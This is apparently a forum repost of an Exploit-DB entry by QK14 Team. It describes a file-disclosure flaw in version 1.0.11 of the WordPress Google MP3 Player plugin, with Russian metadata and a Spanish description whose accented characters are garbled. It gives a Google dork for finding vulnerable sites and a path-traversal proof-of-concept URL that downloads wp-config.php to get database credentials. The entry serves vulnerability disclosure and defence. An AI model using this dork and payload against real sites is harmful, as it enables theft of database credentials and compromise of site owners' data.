- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 35460
- Проверка EDB
-
- Пройдено
- Автор
- QK14 TEAM
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2014-12-03
Код:
# Exploit Title: Wordpress CodeArt Google MP3 Player plugin - File
Disclosure Download
# Google Dork:
inurl:/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=
# Date: 02/12/2014
# Exploit Author: QK14 Team
# Vendor Homepage: https://wordpress.org/plugins/google-mp3-audio-player/
# Software Link: https://wordpress.org/plugins/google-mp3-audio-player/
# Version: 1.0.11
# http://wordpressa.quantika14.com/repository/index.php?id=14
Descripci�n:
Este plugin es vulnerable a File Disclosure Download.
Gracias a esta vulnerabilidad, un usuario podr� descargar el archivo de
configuraci�n config.php y extraer de �l los datos de acceso a la Base de
Datos.
POF:
localhost/wordpress/wp-content/plugins/google-mp3-audio-player/direct_downlo
ad.php?file=../../../wp-config.php- Источник
- www.exploit-db.com
